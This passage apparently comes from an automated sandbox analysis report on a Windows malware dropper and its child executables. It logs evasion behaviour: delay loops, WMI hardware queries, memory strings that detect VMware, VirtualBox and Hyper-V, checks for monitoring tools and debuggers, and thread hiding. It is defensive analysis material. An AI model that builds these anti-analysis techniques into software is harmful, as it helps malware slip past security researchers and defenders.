                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1700Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe TID: 7248Thread sleep time: -210000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2696Thread sleep count: 9706 > 30
                              Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2696Thread sleep time: -970600s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\service123.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\service123.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00DF2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_00622390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00622390
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_003E2390
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00DF5467
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 100000
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 99870
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 99765
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 99620
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 99139
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 98983
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 98858
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 98749
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 98640
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 98526
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 98412
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 98281
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 98171
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 98062
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 97952
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 97843
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 97734
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 97624
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 97504
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 97375
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 97265
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 97155
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 97039
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 96935
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 96773
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 96468
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 96343
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 96234
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 96124
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 96015
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 95906
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 95796
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 95687
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 95559
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 95406
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 95298
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 95175
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 95025
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 94913
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 94799
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 94672
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 94567
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 94372
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 94247
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 94145
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 94011
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 93906
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 93794
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 93669
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 93562
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 93451
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 93349
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 93210
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 93090
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 92986
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 92850
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeThread delayed: delay time: 92733
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WerFault.exeThread delayed: delay time: 30000
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware\V
                              Source: i9z22.exe, 00000001.00000003.1820703480.0000000004EAF000.00000004.00000020.00020000.00000000.sdmp, 1I15f6.exe, 1I15f6.exe, 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmp, 2i7672.exe, 2i7672.exe, 00000005.00000002.1962161432.0000000000C80000.00000040.00000001.01000000.0000000B.sdmp, 3m20j.exe, 3m20j.exe, 0000000A.00000002.2488812926.0000000001074000.00000040.00000001.01000000.0000000D.sdmp, 3m20j.exe, 0000000A.00000000.1966085181.0000000001073000.00000080.00000001.01000000.0000000D.sdmp, 5813f66ed1.exe, 0000000C.00000002.2290019046.000000000088F000.00000040.00000001.01000000.0000000E.sdmp, ae64e67a81.exe, 00000013.00000002.2385447812.0000000000224000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                              Source: 2i7672.exe, 00000005.00000002.1961816047.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000003.1961193067.000000000083C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                              Source: 1I15f6.exe, 00000003.00000003.1866676431.00000000010E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen@\fq
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dll
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $fq 1:en-CH:VMware|VIRTUAL|A M I|Xen
                              Source: 2i7672.exe, 00000005.00000003.1960896276.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961816047.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000003.1961193067.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961600958.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2492560230.0000000001816000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2492560230.0000000001847000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 5813f66ed1.exe, 0000000C.00000003.2065972108.0000000001126000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2190681116.0000000001122000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2290875133.0000000001124000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $fq"C:\Windows\system32\vmGuestLib.dll@
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $fq"C:\Windows\system32\vmGuestLib.dll
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 7BWP8h166sT4SvU tpUvVtaP@\fq0Microsoft|VMWare|Virtual
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual@\fq
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWareLRfq
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 3MR63 X979EFKZD3@\fq0VMware|VIRTUAL|A M I|Xen
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dll@\fq
                              Source: 5813f66ed1.exe, 0000000C.00000003.2289027804.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2290728694.00000000010DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $fq 1:en-CH:Microsoft|VMWare|Virtual
                              Source: 1I15f6.exe, 00000003.00000003.1869661784.00000000010C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareLRfqQ
                              Source: svchost.exe, 00000014.00000003.2361824287.00000000054A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.00000000017D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                              Source: svchost.exe, 00000014.00000003.2361824287.00000000054A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                              Source: i9z22.exe, 00000001.00000003.1820703480.0000000004EAF000.00000004.00000020.00020000.00000000.sdmp, 1I15f6.exe, 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmp, 2i7672.exe, 00000005.00000002.1962161432.0000000000C80000.00000040.00000001.01000000.0000000B.sdmp, 3m20j.exe, 0000000A.00000002.2488812926.0000000001074000.00000040.00000001.01000000.0000000D.sdmp, 3m20j.exe, 0000000A.00000000.1966085181.0000000001073000.00000080.00000001.01000000.0000000D.sdmp, 5813f66ed1.exe, 0000000C.00000002.2290019046.000000000088F000.00000040.00000001.01000000.0000000E.sdmp, ae64e67a81.exe, 00000013.00000002.2385447812.0000000000224000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSystem information queried: ModuleInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                              Source: C:\Users\user\AppData\Local\Temp\service123.exeSystem information queried: CodeIntegrityInformation
                              Source: C:\Windows\System32\cmd.exeSystem information queried: CodeIntegrityInformation
                              Hides threads from debuggers
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeThread information set: HideFromDebugger
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeThread information set: HideFromDebugger
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                              Tries to detect sandboxes and other dynamic analysis tools (window names)
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
                              Source: C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exeSystem information queried: KernelDebuggerInformation
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeProcess queried: DebugPort
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeProcess queried: DebugPort
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_04DA0B3E rdtsc 3_2_04DA0B3E
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6BF8AC62
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00DF2F1D
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006E652B mov eax, dword ptr fs:[00000030h]3_2_006E652B
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006EA302 mov eax, dword ptr fs:[00000030h]3_2_006EA302
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DF6CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_00626CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00626CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E6F40 SetUnhandledExceptionFilter,2_2_003E6F40
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_003E6CF0
